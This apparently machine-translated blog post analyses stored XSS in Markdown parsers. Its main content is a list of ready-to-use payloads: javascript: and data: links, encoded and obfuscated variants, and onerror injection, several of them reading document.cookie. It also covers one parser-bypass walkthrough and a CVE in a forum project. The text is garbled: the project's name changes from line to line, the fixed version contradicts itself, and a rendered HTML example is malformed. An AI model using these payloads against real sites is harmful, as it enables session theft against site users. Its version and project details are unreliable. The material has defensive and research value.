Vulnerability Analysis: a persistent XSS vulnerability in the Markdown parser

Vulnerability Analysis: a persistent XSS vulnerability in the Markdown parser

What is Markdown?

Markdown is a lightweight markup language. The popularity of Markdown has been widely supported by GitHub and Stack Overflow. as an ordinary person, we can also get started easily.

Using markdown to write articles is awesome. You can leave all the trivial HTML tags behind. In the past five years, markdown has received a lot of attention. Many applications, including Reddit, Github, and StackOverflow, use markdown, which has also led to the emergence of many markdown parser, some markdown syntaxes are defined here. The syntax conventions are that the markdown parser parses these tags into html tags.

Markdown security status quo

What is the security status of the Markdown parser? Does it filter user input data?

In fact, many markdown Resolvers do not filter user input data. If markdown is used to add user comments and other functions, there may be security risks.

Here are some discussions about this issue: [1], [2], [3].

In addition, if you use googe to search:

markdown xss issue site:github.com

You will find XSS vulnerabilities in many high-star projects on github.

So, how to construct some payload? See the following:

[a](javascript:prompt(document.cookie))
[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))\
<javascript:prompt(document.cookie)> 
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>  
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
![a&#039;"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)

The above payload was developed by Aleksa and the original author. In the past 12 months, the above payload has been proven to be valid in actual penetration tests. And many markdown Resolvers are affected. Let's take a look at the last payload:

[test](javascript://%0d%0aprompt(1);com)

We guess that the markdown parser may perform parsing and conversion through the following steps:

Is there a protocol header? // Javascript pseudo protocol, Y

Is hostname ending with a common domain name suffix (com, org? // Yes. Y ends with com

Convert the preceding payload to an HTML Tag. // The result is as follows:

 
 

  
  
<a href="javascript://%0d%0aprompt(1);com>test</a> 
 
 

An XSS payload is constructed successfully! After you click the above link, the XSS will be triggered!

A persistent XSS Vulnerability (CVE-2014-5144)

Telstra is a famous open-source project that provides a community function like Reddit and Hackernews. One of telephony's posts and comments has an XSS vulnerability, and this feature has been around for a long time!

In versions earlier than 0.9.3, the above payload list can cause an XSS vulnerability by posting or posting comments. The vulnerability has been fixed, telvey sent changelog: http://www.telesc.pe/blog/telescope-v093-dailyscope/ here

The payload corresponding to the vulnerability is as follows:

[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

 

Note: The preceding vulnerability has been fixed in telephony> = 0.7.3.